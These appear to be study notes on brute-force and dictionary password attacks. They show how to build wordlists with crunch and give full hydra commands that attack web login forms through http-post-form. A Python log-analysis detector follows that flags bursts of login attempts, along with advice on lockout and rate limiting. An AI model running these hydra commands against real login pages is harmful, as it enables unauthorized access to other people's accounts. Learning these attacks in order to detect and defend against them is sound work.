Definition :
Brute force attack : trying every possible combination of characters to recover a password / username; practical only when the password is short (few characters / digits).
Dictionary attack : taking a wordlist (custom or downloaded) and trying every single password in it.
Creating a wordlist using crunch :
Use : crunch [min length] [max length] [characters to be used] -o [file name] -t [pattern]
Note : -t is optional; use it when certain positions of each word must be fixed letters / digits. In the pattern, literal characters stay as written and each @ is a position filled from the character set, so min length and max length must both equal the pattern length.
Ex 1 : crunch 4 4 123abc$ -o wordlist.txt -t a@@b
Ex 2 : crunch 4 6 12abc$ -o wordlist.txt
Using Hydra to brute force :
hydra -h - lists all options
Basic Syntax : hydra (target IP) -l (username) -P (path to the password wordlist) service_type "service options"
Note : use -L (path to a file containing a username wordlist) instead of -l to try many usernames.
I used the http-post-form service_type because I inspected the page element and checked that the login form uses POST.
For the module's own option description run : hydra -U http-post-form (prints a long description of the module)
Generally : the service string consists of 3 parts, each separated by ":" :
- Rest of the URL excluding the IP (the login page path)
- (username_variable)=^USER^&(password_variable)=^PASS^ (plus any other fields the form sends)
Note : to find the username and password variable names, intercept the login request with the Burp Suite proxy, look at the request body, and also copy anything the form sends besides the two variables.
- F=(message appearing when the password is wrong)
Final Code Example :
hydra (IP or domain name) -l admin -P /root/test.txt http-post-form "(login page path):username=^USER^&password=^PASS^&login-php-submit-button=Login:F=Not Logged In"
Or
hydra -l admin -P rockyou.txt -f target.com -s (port) http-post-form "/login.php:username=^USER^&password=^PASS^:wrong password" -t 64 -IV
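The commands above leave a clear trace on the target: one source sends a burst of POST requests to the same login path, far faster than any person types. As an added example (not part of these notes, and not code from hydra or crunch), the following detector reads web server lines in the common "combined" log format and flags any client that sends at least a threshold number of POSTs to the login path within a sliding time window. The login path /login.php, the 60 second window, the threshold of 10 and the sample log lines are all constructed assumptions for the demonstration; on a real server you would tune them to the site's normal traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Apache / nginx "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, login_path="/login.php", window_s=60, threshold=10):
    """Return {ip: peak count} for clients that POSTed to login_path at least
    `threshold` times inside any `window_s`-second window (sliding per client)."""
    recent = defaultdict(deque)   # ip -> timestamps of that client's recent login POSTs
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        # drop attempts that fell out of the window (lines are assumed time-ordered)
        while (rec["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


def _log(ip, ts, method, path, status, size):
    # Helper that builds a constructed log line in combined format.
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'


# Constructed sample: one normal login from 10.0.0.5, then a burst from 203.0.113.7
# (12 POSTs in 12 seconds, the shape a parallel wordlist attack produces).
SAMPLE_LOG = [
    _log("10.0.0.5", "12/Mar/2024:10:00:01 +0000", "GET", "/login.php", 200, 1320),
    _log("10.0.0.5", "12/Mar/2024:10:00:09 +0000", "POST", "/login.php", 302, 0),
    _log("10.0.0.5", "12/Mar/2024:10:00:10 +0000", "GET", "/index.php", 200, 4810),
] + [
    _log("203.0.113.7", f"12/Mar/2024:10:05:{s:02d} +0000", "POST", "/login.php", 200, 1410)
    for s in range(12)
]


if __name__ == "__main__":
    for ip, count in detect_login_bursts(SAMPLE_LOG).items():
        print(f"possible password guessing from {ip}: {count} login POSTs within 60s")
```

The detector keys on request volume rather than on the "wrong password" text, because that text lives in the response body and is not in an access log; the uniform 200 status and identical response size on every attempt are a second signal worth adding once you know what a failed login looks like on your own site. Pairing the alert with account lockout or rate limiting on the login path removes most of the value of a wordlist attack in the first place.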